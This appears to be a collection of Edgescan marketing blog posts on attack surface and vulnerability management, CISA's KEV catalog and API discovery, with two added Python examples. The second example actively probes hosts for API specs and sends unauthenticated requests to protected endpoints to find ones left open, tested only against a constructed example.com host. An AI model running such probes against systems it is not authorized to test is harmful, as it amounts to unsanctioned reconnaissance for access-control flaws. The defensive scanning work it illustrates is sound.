- Answers to any questions about needs within your particular environment
- Updates on the latest developments of the Edgescan Platform
- An exclusive gift from Edgescan to take home

### Attack Surface Management - Is It Acceptable To Let Things Die On The Vine?

Visibility is of paramount importance in cyber security. We cannot secure what we cannot see. Is it acceptable to let things die on the vine?

Enterprises invest a lot of time, money, and effort in getting services launched. From research to deployment, there are processes to help get projects off the ground. But, much like the space junk we have in orbit, there is often little thought given to what happens once these services have served their purpose. This seemingly innocuous behaviour poses a significant security risk. Unlike grapes on a vine, the risk doesn’t just wither away, it gets worse over time.

#### Festering Vulnerability

While there is a wide variety of causes, one thing is certain – legacy services and their related exposed surfaces become more vulnerable over time. Legacy services can vary depending on the type of business the enterprise is pursuing. Examples of legacy services can include:

- allowing a customer to access their business account online
- providing updatable health records in a web application
- mobile banking services
- offering a public online gaming community database
- providing an internal web-client for access to servers and databases for developers.

If we are not aware that the service has been allowed to die on the vine, we may not be adequately protecting a critical asset. Allowing old services to persist is not playing it safe – it is introducing your organization to a larger window of exposure and, in most cases, completely unnecessary risk.
Sometimes it is not possible to end-of-life (EOL) a legacy service, and then countermeasures need to be deployed.

Your Options

The best option is to shut down legacy services when they are no longer needed and provide a re-introduction request process for when the business requires them again. The second option, if a true business need persists, is to knowingly allow the service to remain exposed and agree on an end-of-life schedule. It can then be shut down when that makes business sense, while the risk is managed effectively in the meantime.

What Can You Do Right Now if You Simply Do Not Know What is Live?

If your management of archived assets has been less than stellar (and most enterprises do NOT have a good handle on this), you should perform a discovery audit of your entire attack surface. There are now dedicated automated solutions that perform this task continuously. Scan results should be verified by in-house security experts or as part of a hybrid solution with your Vulnerability Management provider. Once you have an accurate picture of your attack surface exposures, you can begin coordinating with business line managers to ensure that your decisions balance both business and security requirements.

Ideally, any new technology or service will be deployed with an end-of-life plan already in place. You should have a plan for retiring the technology even if that date is years in the future. Working with known, managed risk instead of flying blind is fundamental to preventing significant negative events.

If you would like to learn more about External Attack Surface Management, see: https://edgescanstage.wpengine.com/native-cloud-integration-for-asm-and-vulnerability-management/

Effective Attack Surface Management with ASM

At Edgescan, we understand that managing your attack surface is critical in today's dynamic threat environment. Our Attack Surface Management (ASM) service helps identify and mitigate risks across your entire digital presence.
With our teams based in Dublin and New York, we ensure that no threat is left unchecked, providing you with comprehensive protection.

### Checklist for Selecting a Vulnerability Management Solution

In 2022, leaps and bounds have been made towards more robust and complete Vulnerability Management solutions. The Global 3000 Enterprise now has the luxury of expecting a solution to meet a very high bar. But does the Enterprise know what it wants? The balance between a scalable and an accurate vulnerability management solution has been top of mind for Enterprises for some time now (as it should be). Solving for both, though, should not come at the expense of other requirements. We have put together a checklist of eight important requirements that might benefit your evaluation of Vulnerability Management Solutions in 2022.

- Time Zones – Global means global. Make sure your service follows the sun. Bonus checklist item: make sure that your supplier does not achieve this through partnered or sub-contracted relationships that could affect operational efficiency. It should be 100% in-house. Service quality consistency can suffer when a supplier cobbles together third parties to meet your time zone requirements.
- Disaster Management – Your provider should be able to demonstrate resilient zones across geographic areas and offer a two-to-three second return to service after any failure.
- Performance – The platform interface simply should not demonstrate any meaningful lag for human operations. Page load times should be under 3 seconds, even under heavy load.
- Contextualized Alerts – Your selected solution should provide custom alerts that can be contextualized for your needs within your country, industry and company.
- Integration to Enterprise Support Systems – Your solution should be able to take ranked alerts and automatically communicate them in a format your operational support teams already use (IT Service Management system, instant messaging, tickets, email, etc.).
- Prioritization of Assets – The system should be pre-built to allow asset types to be prioritized against what matters most for each client's business. Your critical and not-so-critical items must be categorized accordingly.
- Modular Platform – The solution needs to be adaptable, accommodating clients who only need a subset of the services on offer or who want to scale to the full platform over time. Your provider must demonstrate value against your immediate departmental needs (API, network, web apps, Attack Surface Management, pen testing, etc.) and demonstrate long-term capacity to scale.
- Client Self-Service – Ideally, clients themselves should be able to configure which alerts (network, web apps, API, etc.) and which locations (North American server, European database, etc.) generate notifications. Ultimately this is your tool, and you need the ability to steer it strategically yourself.

If you would like to learn more about the steps the Edgescan engineering and security team took to create the ideal Vulnerability Management War Room, download our whitepaper.

### Use Case – Delivering Both on Scale and Accuracy

For years Edgescan has worked with a large media conglomerate known for putting its most trusted security suppliers through bake-offs to ensure a best-in-class risk posture. They have the budget and the aptitude to try any innovative solution that can help to that end. Our years of working together have shaped how Edgescan understands the challenge Enterprises face today.
The Challenge – Deliver Scale and Accuracy for a Web Application Vulnerability Management (VM) Program

Fueled by growing technology adoption, the client needed a new solution to scale their Vulnerability Management (VM) program. Their existing solutions simply could not scale while remaining accurate across over 5000 web applications spanning all of their corporate entities and geographies.

Edgescan Initial Solution

Edgescan quickly established a baseline security posture for all 5000 web applications across all business units. Within one month, Edgescan demonstrated it could handle the scale while providing accuracy. As the client's environments grew and more applications required scanning, the Edgescan solution continued to provide accuracy under increased load. Previously, with the existing solution and staff manually validating the results, the team could not keep up with the number of alerts they were receiving. With Edgescan's hybrid platform, the validation process easily kept pace with the alerts.

Expanding from Web Applications to Penetration Testing

Based on the success of the Web Application Vulnerability Management solution, the client turned to Edgescan for Penetration Testing as a Service (PTaaS). They had previously struggled to secure penetration testing that could keep up with their expanding attack surface; they could not scale even when engaging third-party contractors. Edgescan, armed with Web Application Vulnerability Management intelligence, ranked each system in concert with the client's business requirements and prioritized for pen testing the vulnerabilities that presented critical risk and mattered to the organization. Because all pen testing and vulnerability scanning was done in one centralized platform, the client was able to scale their pen testing as required.
Proving Value for Five Years Running

As mentioned earlier, the client has the budget and security acumen to test established, new and upcoming security tools; they can work with anyone. Each year, the Edgescan solution is placed in a head-to-head competition (a "bake-off") against competing solutions. In each of the last five years, Edgescan has conclusively won every competition and continues to hold a strategic and trusted role within the client's overall Cyber Security Program.

Engagement Numbers

- Day 1 – 4 hours to hack: it took Edgescan only 4 hours to hack into the client's system the first time.
- Day 300 – 48 hours to hack: after the Edgescan solution was deployed, it took 48 hours to hack into the system.
- 5000 web applications: the number of web applications the Edgescan Platform scaled to without sacrificing accuracy.
- 24 hours and 500 websites: the time taken for Edgescan to onboard 500 new websites (as opposed to weeks or months).
- 50% cost savings: the cost of pen testing was reduced by up to 50% without reducing coverage or accuracy.
- 2 vs 8 staff members: without the Edgescan solution, the client assigned eight members of their security team to validate automated results. With Edgescan they assign two, and deploy the remaining six on strategic activities.

Scaling Security with PTaaS

We understand the importance of balancing scalability with accuracy. That's why our Penetration Testing as a Service (PTaaS) provides reliable testing for enterprises of all sizes. With offices in Dublin and New York, we ensure your security posture is strong no matter how large your operations.
### RSA Conference 2022

PAST EVENT: 6-9 June 2022 | San Francisco

One-on-One Sessions provided:

- A dedicated session with an Edgescan Solution Professional
- Answers to any questions about needs within your particular environment
- Updates on the latest developments of the Edgescan Platform
- An exclusive gift from Edgescan to take home

### Injecting Smart Vulnerability Management (VM) into IT Ops

If you follow our blog series, you will know that we advocate three basic tenets to achieve Smart Vulnerability Management:

- Full-Stack – A single solution across the entire attack surface, including the network, web applications and APIs, provides a single touchstone of truth.
- Hybrid – A scanning solution integrated with human expertise delivers alerts that are virtually free of false positives.
- Ops Integration – Integration with IT Service Management (ITSM) tools ensures that IT Ops staff receive accurately ranked, business-contextualized alerts inside the systems they already use, supporting optimal remediation SLAs.

Typically the benefits of the Full-Stack and Hybrid models are top of mind when considering our solution. However, one of our larger global enterprise clients recently reported that the Ops Integration feature drove their decision to adopt our Smart Vulnerability Management solution. Ops Integration provides a huge benefit, enabling the IT department to focus on the alerts that really matter without disturbing their daily workflow. The weight it carried in their decision-making highlighted the importance of Ops Integration and inspired us to share the engagement details with our community.

The Details

This client found API discovery and assessment particularly challenging. They did not have an accurate solution in play, and they did not have an efficient way to tell IT which API issues required timely remediation. The client required that their API discovery and assessment solution integrate with their IT service management platform, ServiceNow.
They were using the VM module within ServiceNow. However, the massive project to build an end-to-end integration between their current ecosystem of scanning tools and ServiceNow was far too expensive and would take too much time. Edgescan provided an ROI analysis showing the headcount and associated cost reduction that the Edgescan API solution would yield. The compelling reason for selecting Edgescan, however, was that it could integrate with ServiceNow quickly and without significant cost. The client had projected an 18-month effort to integrate their original group of scanning tools with ServiceNow; with Edgescan's hosted platform, the integration took one month.

Accuracy was a Gate Keeper

In addition to saving time on the integration, the client also valued the accuracy of false-positive-free output, which was key in driving initial acceptance of the service. Edgescan initially discovered 2200 APIs where the client's existing solution had reported only 500. This was more than enough to convince the client of the solution's accuracy.

Takeaways

What can we learn from an organization that put such emphasis on Ops Integration?

- Getting Priorities Straight – The weight Ops Integration carried in their decision is a reminder of the importance of placing Vulnerability Management intelligence in the hands of those who will fix the issue. Without this, Mean Time to Repair (MTTR) metrics will suffer.
- The Sheer Number of Automated Scanning Solutions is a Problem – Gartner and others have stated that the overhead cost of managing multiple point scanning solutions is significant. The cost and time to integrate each of them into an ITSM tool is yet another reason to consolidate.
- Hosted Solutions Offer Integration Advantages – A home-grown ecosystem of Vulnerability Management tools is inherently difficult to integrate.
A hosted solution pre-baked with integrations into major IT Service Management tools like ServiceNow lets you focus on ranking automated alerts so that the things that matter are remediated quickly. If you would like to learn more about injecting Smart Vulnerability Management into your IT Operations, get in touch with Edgescan.

### DBIR 2022 Edgescan Observations

The Verizon DBIR 2022 report is out and, as always, it looks and reads like a strong team of dedicated security experts developed it; thank you to Gabriel Bassett, Charles Hylender, Alex Pinto and the wider team for such a great analysis. Edgescan was lucky to be chosen as a supplier of vulnerability analytics data to the report for the third year. We are very proud that our triaged, full-stack vulnerability intel, based on thousands of PTaaS (Penetration Testing as a Service) assessments and continuous vulnerability scans, is of use in developing this report.

The key items resonate with what we see at Edgescan. The problems don't change that much; they just become more commonplace and larger as the years go by.

Ransomware has increased substantially in breaches

Ransomware is not going away. The common misunderstanding is that it is a highly complicated attack using lots of hi-tech, AI and ML. The reality is that many ransomware attacks include the human element. Targeted attacks use intelligent criminals to enumerate and scope a firm's attack surface. An attack may begin with phishing, after which a talented team takes over, or the breach may result from exploitation of a CVE in an unpatched, exposed or misconfigured endpoint or application. A significant part of ransomware readiness is resilience. This includes frequent assessment of production assets, network, web applications and APIs, and also ASM, to maintain continuous visibility of exposure. The fundamentals of a decent cyber posture are still the same; it's the threat landscape that evolves.

Incidents are driven by four main types of access to the victim's estate: credentials, phishing, exploiting vulnerabilities and botnets

Vulnerability exploitation is still an issue, and has been a core issue for years. Credential theft can itself be the result of vulnerability exploitation, which feeds further account compromise. Not much has changed in terms of types of attack; from an attacker's standpoint, why change something that works?

The human element is still a pervasive issue across the breach landscape

I'm unsure if we can remove the "human element" from cyber security, in terms of either attackers or defenders. The human element is (still) the most advanced tool for depth of understanding, complex exploitation and intelligent defence. The bottom line is that we need humans to fight humans: fight fire with fire. Software alone fighting the "human element" is destined for failure, but software and automation combined with humans works a treat and helps with scale, depth and accuracy. Misconfiguration errors have continued to decrease, a potential sign of hope that misconfigured, internet-exposed cloud resources are diminishing. Making humans "bionic" in terms of cyber posture, reactiveness, scale versus depth, and accuracy can bring a huge return on investment to any business.

Simplifying Data Security with DAST

The DBIR report underscores the growing risks to application-layer security. Our Dynamic Application Security Testing (DAST) identifies and helps remediate vulnerabilities, keeping your applications safe. With offices in Dublin and New York, we're committed to helping you navigate today's complex security challenges.

### Optimal VM Through Design - Leveraging UX Design to Help Reduce the Noise and Focus on What Matters

If you have been following our thought leadership series, you will know that Edgescan's core approach to achieving optimal Vulnerability Management is to remove noise and enable security professionals to focus on what really matters.
The two-pronged method for achieving this goal is to get rid of false positives (the noise) through a hybrid model and to offer a single touchstone of truth with a full-stack VM platform. We call this the Smart VM approach. But another key element of decluttering noise and enabling actionable intelligence is the design of the alert dashboard itself.

The Design Challenge – Noise Reduction Theme

Designers are often mostly concerned with the brand theme they are trying to evoke. In this case, the UX designers were charged with a very important functional task: enabling "noise reduction". The UX was built around noise-reduction design principles, simplifying complexity and reducing clutter by exposing users only to relevant information.

Design Highlights

We seized on opportunities to innovate on the user experience at every step, including:

- Focus on What Matters – a single action on the main dashboard highlights priority issues.
- Intelligent Asset Searches – improved asset filtering places the information users need at their fingertips.
- Rapid Issue Ranking through Color Choices – the final color palette is fully color-blind accessible. Traffic-light systems are used in all critical areas, so the information is understandable even on first use.
- Personalization – the dashboard was designed so that every user has a personalized experience based on their user profile.

Tone Balance – Friendly vs Serious

To provide a distinctive look and feel, we wanted the design aesthetic to convey an appealing, clean and inviting interface. Yet it also needed to convey an air of assertive professionalism, appropriate to the serious tasks that users (both our security team and our client users) perform with the software. We worked to balance these contradicting requirements while staying true to our established brand identity.
The UI is optimized according to responsive design principles, and the pattern library is delivered using the atomic design methodology. This gives us the flexibility to integrate and develop new features quickly. As Edgescan Product Architect David Kennefick explains, "The comprehensive component library ensures developers aren't in danger of spending time making decisions outside their area of expertise, bringing confidence that their work will reach a high visual standard."

Bonus Benefit – Time Savings

The new interface not only reflects our competitive advantage; it also delivers valuable time savings for our users. As David Kennefick explains, "Support and overhead costs for onboarding and training are reduced by introducing more intuitive design, combined with more ways to authenticate. It's much easier for our clients to train new staff on the Edgescan platform." Validating complex security risks takes time and resources, and reducing the complexity of these tasks became the cornerstone of every design decision.

Measurable Benefits

Our customers are now able to generate reports up to 25% faster, and decision-making times are reduced by up to 15%: significant time savings for our clients. The new application design also directly reflects what makes us stand out from the competition, our unique focus on noise reduction. The new Edgescan UI has been awarded the prestigious iF Design Awards and Good Design Awards 2021. It has been described by ITSecurityguru.org (5/5 in almost all ratings) as "very well designed…making false positives a thing of the past."

To learn more about the Edgescan Platform and see a demo of the award-winning design, contact Edgescan.

Reducing Noise with NVM

We understand the challenges of dealing with overwhelming cybersecurity alerts. Our Network Vulnerability Management (NVM) helps you cut through the noise and focus on critical risks.
From Dublin to New York, we make vulnerability management smarter and more efficient.

### Tableau Integration with Edgescan

Edgescan is excited to announce the availability of a fully supported Tableau integration. In the era of big data, most companies use Business Intelligence and data analysis tools to analyze their business data and make more informed decisions. Business Intelligence tools such as Tableau allow organizations to visualize this data in the form of worksheets, dashboards and reports. Using the Tableau integration, users can fetch data across all aspects of Edgescan, including information on assets, vulnerabilities and plenty more. Edgescan and Tableau together form a strong combination for any team looking to use data to plan and execute long- and short-term goals and to increase the value derived from using Edgescan.

Below are three ways users can use the power of Edgescan and Tableau:

- Bring full-stack vulnerability datasets together for easy analysis, supplying a single source of truth.
- Understand and manage vulnerabilities in your organization using intuitive worksheets, dashboards and reports.
- Find potential areas of risk by applying the many analysis techniques available within Tableau.

For more information on how to activate this integration, please visit our dedicated Tableau integrations page.

Tableau Integration with Edgescan

We've integrated with Tableau to provide better visualization and insights into your vulnerabilities. Our Attack Surface Management (ASM) ensures that you can monitor and secure your digital assets effectively. Whether you're in Dublin or New York, we help you make data-driven decisions to strengthen your security.

### DevOps Best Practices Webinar

PRESENTERS: Eoin Keary | Jim Manico

Eoin and Jim give an introduction to DevOps and DevSecOps with a CI/CD focus.
### Why is the VM Industry Proliferated with Point Solutions?

It seems almost obvious that a single, composite view is superior to a layered approach. So one must ask: why is the industry proliferated with point solutions?

How Did We Get Here?

The most straightforward explanation is that the underlying technology itself developed in a piecemeal fashion. The specialized tools, and the expertise to manage them, organically reflect the history of technology development. Attacking as a practice predates IT and the internet; there were "telephone hacks", for example, before IT and the web surfaced. As attackers developed approaches to leverage new access points, cyber security suppliers developed tools for each new layer of concern.

The Marketplace Itself Embraced Point Solutions

As each layer-focused toolset matured, the industry positioned and ranked it within the scope of its layer. The question was (and for the industry still is) which tool is best for each layer? The more important question should have been (and should be today): how can I have a more accurate and more comprehensive view of what the attacker sees? How can I have a solution that accurately detects the vulnerabilities and weaknesses that matter to our organization, regardless of where they occur? How can I focus on what really matters?

How Bad is the Problem?

While it might seem intuitive in the abstract to advocate for a single, full-stack solution, does the industry reality reflect the fact that we have built up an unwieldy plethora of point solutions dedicated to each stack layer? Is the CISO really loaded with an unmanageable number of point solution tools? The answer is that it's probably worse than you imagined.

Houston, We Have a Proliferation Problem

Here are some interesting highlights from Gartner's Top Security and Risk Trends for 2021:

- Security Leaders Have Too Many Tools – What's the number? SIXTEEN. Yes, sixteen or more tools in their portfolio, and 12% have 46 or more!
- What's the Problem with Proliferation? – Security operations has become too complex and requires too much headcount to manage it all.
- How Many Enterprises Recognize the Need for a Fix? – 80% of organizations are interested in a vendor consolidation strategy.
- Solution Provider Response – Large security vendors are responding with better-integrated products, but are not taking on the challenge of a full-stack solution.
- Correcting History is Not Easy – Consolidation is not easy. According to Gartner, on average it takes YEARS to roll out.
- Surprising Conclusion: Lower Cost with Improved Security Posture – While cost reduction might initially be the driver, consolidation delivers both streamlined operations and lower security risk.

Takeaway

It is a problem. It's a big problem. And the industry wants to fix the problem.

Does History Define Our Vulnerability Management (VM) Approach?

Now here is the rub. If a cyber security department has followed the industry path of an individual, layered approach, does it have to make the best of a flawed approach by optimizing the individual tools and manually consolidating data? The answer is no: there are single full-stack solutions available to provide a corrective course of action.

Simplifying VM with a Unified Approach

We know managing multiple tools can be overwhelming. That's why our Network Vulnerability Management (NVM) delivers a unified solution for comprehensive coverage. With offices in Dublin and New York, we simplify security for organizations worldwide.

### OWASP Top 10 Webinar

PRESENTERS: Eoin Keary | Jim Manico

Eoin and Jim sit down to take a look at the OWASP Top 10 and how these risks affect organizations.

The OWASP Top 10 is a standard awareness document for web developers and web application security professionals. It represents a broad consensus about the most critical security risks to web applications.
As software developers author the code that makes up a web application, they need to embrace and practice secure coding techniques. This training provides defensive instruction on the OWASP Top Ten to aid developers in authoring secure software.

- A01:2021-Broken Access Control
- A02:2021-Cryptographic Failures
- A03:2021-Injection
- A04:2021-Insecure Design
- A05:2021-Security Misconfiguration
- A06:2021-Vulnerable and Outdated Components
- A07:2021-Identification and Authentication Failures
- A08:2021-Software and Data Integrity Failures
- A09:2021-Security Logging and Monitoring Failures
- A10:2021-Server-Side Request Forgery

### CISA 101 for Enterprises – Why CISA Matters

What is CISA?

CISA stands for the Cybersecurity and Infrastructure Security Agency. It leads the United States national effort to understand, manage and reduce risk to American cyber and physical infrastructure. Its vision is a secure and resilient critical infrastructure for the American people.

Is CISA just a concern for Government Agencies?

No. CISA plays two key roles:

- Quarterback for the Federal Cybersecurity Team – CISA protects and defends the American home front, the federal civilian government networks.
- National Coordinator for Critical Infrastructure and Resilience – CISA also looks at the entire threat picture and works with partners across both government and industry.

As threats continue to evolve, no single organization or entity has all the answers for how to address cyber threats. By bringing together insight and capabilities from the public AND private sectors, a collective defense is built against the threats the nation faces. Enterprises can benefit from this collective insight.

How Exactly Does the Enterprise Benefit from the Collective Insight that CISA has Built?

The answer is to be found in the CISA list.
CISA maintains a list called the Known Exploited Vulnerabilities (KEV) Catalog. Entries are added on evidence of active exploitation in the wild. Vulnerabilities of this type are a frequent attack vector for malicious cyber actors and pose significant risk to federal agencies and private enterprises alike.

Are Enterprises legally required to remediate identified vulnerabilities on the CISA list?

Binding Operational Directive (BOD) 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice.

Can and Should the Enterprise Share Cyber Event Information?

Yes and yes. Cybersecurity information sharing is essential to collective defense and to strengthening cybersecurity for the nation. When cyber incidents are reported quickly, CISA can use the information to render assistance and to warn other organizations so that they do not fall victim to a similar attack. The information is also critical to identifying trends that can help efforts to protect the homeland. Stakeholders can learn how to share cyber event information in CISA's Sharing Cyber Event Information Fact Sheet.

Is the CISA List Kept up to Date?

The catalog is actively kept up to date. Here is an example of a recent update from the CISA website:

How can I keep up to date on the list?

Enterprises can subscribe to CISA's Known Exploited Vulnerabilities Catalog Update Bulletin.

Is there an efficient way for my Enterprise Vulnerability Management (VM) Program to quickly identify whether any of our detected vulnerabilities match the current CISA list?

Edgescan currently offers a new threat intelligence and risk-based prioritization feature.
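As an added worked example (written for this page, not Edgescan code or the platform feature described here), the following Python cross-references a list of scanner findings against the KEV feed. It uses the field names of CISA's published JSON feed (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json, with `cveID`, `vulnerabilityName`, `requiredAction` and `dueDate`); the two catalog entries, the hostnames and the findings embedded below are constructed for illustration, and a real run would load the downloaded feed instead of the inline string. CVE IDs are normalised before lookup, findings with no CVE are skipped, and matches are ordered so the most overdue BOD 22-01 deadline comes first.

```python
"""Cross-reference scanner findings against the CISA KEV catalog (added example)."""
import json
from datetime import date

# Constructed excerpt in the shape of CISA's KEV JSON feed. Field names match the
# real feed; the two entries and their dates are illustrative, not a live copy.
KEV_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2022.04.05",
    "count": 2,
    "vulnerabilities": [
        {
            "cveID": "CVE-2022-22965",
            "vendorProject": "VMware",
            "product": "Spring Framework",
            "vulnerabilityName": "Spring Framework JDK 9+ Remote Code Execution Vulnerability",
            "dateAdded": "2022-04-04",
            "shortDescription": "Spring MVC/WebFlux data-binding RCE on JDK 9+.",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2022-04-25",
        },
        {
            "cveID": "CVE-2021-44228",
            "vendorProject": "Apache",
            "product": "Log4j2",
            "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability",
            "dateAdded": "2021-12-10",
            "shortDescription": "JNDI lookup in logged strings leads to RCE.",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2021-12-24",
        },
    ],
})

# Constructed scanner output: one finding per asset/CVE pair (hypothetical hosts).
FINDINGS = [
    {"asset": "api.example.com", "cve": "cve-2022-22965", "cvss": 9.8},   # lower-case ID
    {"asset": "legacy.example.com", "cve": "CVE-2021-44228", "cvss": 10.0},
    {"asset": "www.example.com", "cve": "CVE-2020-11023", "cvss": 6.1},   # not in the KEV excerpt
    {"asset": "db.example.com", "cve": None, "cvss": 5.3},                # finding with no CVE ID
]


def load_kev(json_text):
    """Index the KEV feed by upper-cased CVE ID so lookups are O(1) and case-insensitive."""
    catalog = json.loads(json_text)
    return {entry["cveID"].strip().upper(): entry for entry in catalog["vulnerabilities"]}


def match_findings(findings, kev, today_iso):
    """Return the findings present in KEV, enriched with the catalog's remediation deadline
    and how far past it we are (negative means days remaining). Sorted most-overdue first,
    ties broken by CVSS. Findings without a CVE are skipped: KEV says nothing about them."""
    today = date.fromisoformat(today_iso)
    matches = []
    for f in findings:
        cve = (f.get("cve") or "").strip().upper()
        entry = kev.get(cve)
        if entry is None:
            continue
        due = date.fromisoformat(entry["dueDate"])
        matches.append({
            "asset": f["asset"],
            "cve": cve,
            "cvss": f["cvss"],
            "kev_name": entry["vulnerabilityName"],
            "due_date": entry["dueDate"],
            "days_past_due": (today - due).days,
            "required_action": entry["requiredAction"],
        })
    matches.sort(key=lambda m: (-m["days_past_due"], -m["cvss"]))
    return matches


if __name__ == "__main__":
    for m in match_findings(FINDINGS, load_kev(KEV_JSON), "2022-04-05"):
        flag = "OVERDUE" if m["days_past_due"] > 0 else "due"
        print(f"{m['asset']:20} {m['cve']:16} {flag} {m['due_date']} ({m['days_past_due']:+d} days)")
```

The sort key is the practical point: a KEV hit with a lapsed due date should jump the queue regardless of CVSS, and a finding with no CVE at all still needs its own triage path rather than silently disappearing.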
This feature gives Enterprises a view that cross-references their vulnerabilities against the CISA KEV catalog. To learn more about how to refine your remediation efforts with the CISA exploit list, go to

### Effective Attack Surface Management – Three Steps to Overcoming the Challenge of API Vulnerabilities

The enterprise attack surface is a continuous challenge for any Vulnerability Management (VM) program. It is not only constantly changing, it is continuously evolving. Anything facing the public internet, including cloud deployments, data centers, firewalls, IoT devices, servers and web services, is potentially attackable. But APIs are a different beast. They require a fundamentally different approach and, frankly, the industry is not mature in managing the special case of APIs.

What Makes APIs so Challenging – Can We Talk?

Not to be dismissive, but web and IP exposures are more easily dealt with by standard scanning tools. Exposures such as an administrator console or an internal database are, in the context of Attack Surface Management, relatively straightforward to handle, and there are mature solutions for them. APIs are a different breed of animal.

The principal challenge is that the security specialist needs to "talk" to an API. One cannot detect API issues with port-scanning-only solutions; it requires a multi-layer probing approach. APIs can "hide" behind regular web ports without being found by typical port scanning technologies.

Even when found, APIs are constantly changing. Changes on the backend can expose new sensitive data, and changes to the application present new risks altogether. Traditional network and application scanning tools were not made for this kind of complexity.

The Solution – A Three-Step Phased Approach

In order to talk to an API for detection purposes, a full-stack probing technology needs to be deployed that looks for APIs across the web application and network stack.
To provide total visibility, a three-phase approach is recommended:

- Phase 1, Passive: analyze the estate looking for indicators of APIs (hostnames, paths, content types and authentication challenges that are characteristic of APIs rather than browser-facing pages).
- Phase 2, Interaction: to discover unknown and shadow APIs, run continuous asset profiling against all available external addresses, with multi-layered checks applied to every live service.
- Phase 3, Assessment and Enumeration: once API discovery is complete, run custom API security assessments against all live services. These are API-specific security checks that determine the security posture of each discovered API.

#### Bonus lesson – extending ASM with VM: a three-layered approach

No matter how accurate and continuous your Attack Surface Management (ASM) program is, you must still manage risk by accurately identifying vulnerabilities as they occur across the full technology stack, assessing their impact, and resolving them in a timely manner. So just as we suggested a three-step approach to API discovery, we suggest layering three basic approaches into VM:

- Layer 1, ASM: continuously and accurately detect and assess your attack surface, including the challenging case of APIs. What can potentially be hacked?
- Layer 2, Vulnerability Management: continuously and accurately detect all vulnerabilities and exposures across the full stack. Rank them by business concern and integrate tightly with support operations to ensure timely remediation of what matters most. What weaknesses do we have?
- Layer 3, Penetration Testing: armed with ASM and VM intelligence, perform laser-focused resilience tests on areas of concern and on complex areas not suited to automation, such as business logic, to determine the validity of any potential issue, and take the extra step of breaking the business logic of applications for 100% validation. What can a skilled attacker do?
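To make the three discovery phases concrete, here is an added example (not Edgescan's discovery engine) that runs them over constructed HTTP responses: phase 1 scores already-observed responses for API-like traits without sending traffic, phase 2 actively probes a service hiding behind a web port by negotiating JSON and requesting common OpenAPI document locations, and phase 3 enumerates the operations in a discovered spec and runs one API-specific check on each (does an operation the spec marks as protected answer without any credential?). The hostname and path heuristics, the spec paths probed and the `fetch` callable signature are assumptions; `SAMPLE_ROUTES` is a constructed stand-in for a live host so the code runs offline.

```python
"""Three-phase API discovery (passive, interaction, assessment) over constructed responses.

Added example, not Edgescan's discovery engine. Heuristics, SPEC_PATHS and the
fetch signature are assumptions; SAMPLE_ROUTES is a constructed host so this runs offline.
"""
import json
import re
from typing import Callable, Tuple

# fetch(method, url, request_headers) -> (status, response_headers, body)
Fetch = Callable[[str, str, dict], Tuple[int, dict, str]]

HOST_RE = re.compile(r"(^|[.-])(api|graphql)([.-]|$)", re.I)
PATH_RE = re.compile(r"/(api|rest|graphql|v\d+)(/|$)", re.I)
SPEC_PATHS = ("/openapi.json", "/swagger.json", "/v3/api-docs", "/api-docs")


def _lower(headers: dict) -> dict:
    return {k.lower(): str(v).lower() for k, v in headers.items()}


def passive_indicators(host: str, path: str, headers: dict) -> list:
    """Phase 1: score one response already in hand for API-like traits; sends no new traffic."""
    h = _lower(headers)
    found = []
    if HOST_RE.search(host):
        found.append("api-like hostname")
    if PATH_RE.search(path):
        found.append("api-like path")
    if "json" in h.get("content-type", ""):
        found.append("JSON content-type")
    if h.get("www-authenticate", "").startswith("bearer"):
        found.append("bearer token challenge")
    if "access-control-allow-origin" in h:
        found.append("CORS headers")
    return found


def interact(base: str, fetch: Fetch) -> dict:
    """Phase 2: actively probe a live web port for an API surface and a machine-readable spec."""
    result = {"spec_url": None, "spec": None, "negotiates_json": False}
    # Content negotiation: an API answers JSON when asked for it, a plain web page does not.
    status, headers, _ = fetch("GET", base + "/", {"Accept": "application/json"})
    if status < 400 and "json" in _lower(headers).get("content-type", ""):
        result["negotiates_json"] = True
    for p in SPEC_PATHS:
        status, _, body = fetch("GET", base + p, {})
        if status != 200:
            continue
        try:
            spec = json.loads(body)
        except ValueError:
            continue
        if isinstance(spec, dict) and "paths" in spec:
            result["spec_url"], result["spec"] = base + p, spec
            break
    return result


def assess(base: str, spec: dict, fetch: Fetch) -> list:
    """Phase 3: enumerate operations from the spec; flag protected ones that serve an unauthenticated request."""
    findings = []
    for path, ops in spec.get("paths", {}).items():
        for method, op in ops.items():
            protected = bool(op.get("security") or spec.get("security"))
            status, _, _ = fetch(method.upper(), base + path, {})  # deliberately no credential
            if protected and 200 <= status < 300:
                findings.append({"operation": f"{method.upper()} {path}",
                                 "issue": "protected operation served without authentication",
                                 "status": status})
    return findings


def discover(base: str, fetch: Fetch) -> dict:
    """Run phases 2 and 3 against one base URL and return a combined report."""
    probe = interact(base, fetch)
    findings = assess(base, probe["spec"], fetch) if probe["spec"] else []
    return {"base": base, "negotiates_json": probe["negotiates_json"],
            "spec_url": probe["spec_url"], "findings": findings}


# Constructed stand-in for a live host: (method, url) -> (status, headers, body).
SAMPLE_SPEC = {"openapi": "3.0.0", "paths": {
    "/v1/users": {"get": {"security": [{"bearer": []}]}},
    "/v1/admin": {"get": {"security": [{"bearer": []}]}},
    "/v1/health": {"get": {}}}}
JSON = {"Content-Type": "application/json"}
SAMPLE_ROUTES = {
    ("GET", "https://api.example.com/"): (200, JSON, '{"service": "orders"}'),
    ("GET", "https://api.example.com/openapi.json"): (200, JSON, json.dumps(SAMPLE_SPEC)),
    ("GET", "https://api.example.com/v1/users"): (200, JSON, '[{"id": 1}]'),      # leaks without auth
    ("GET", "https://api.example.com/v1/admin"): (401, {"WWW-Authenticate": "Bearer"}, ""),
    ("GET", "https://api.example.com/v1/health"): (200, JSON, '{"ok": true}'),
}


def sample_fetch(method: str, url: str, headers: dict):
    return SAMPLE_ROUTES.get((method, url), (404, {}, ""))


if __name__ == "__main__":
    print(passive_indicators("api.example.com", "/v1/users", JSON))
    print(json.dumps(discover("https://api.example.com", sample_fetch), indent=2))
```

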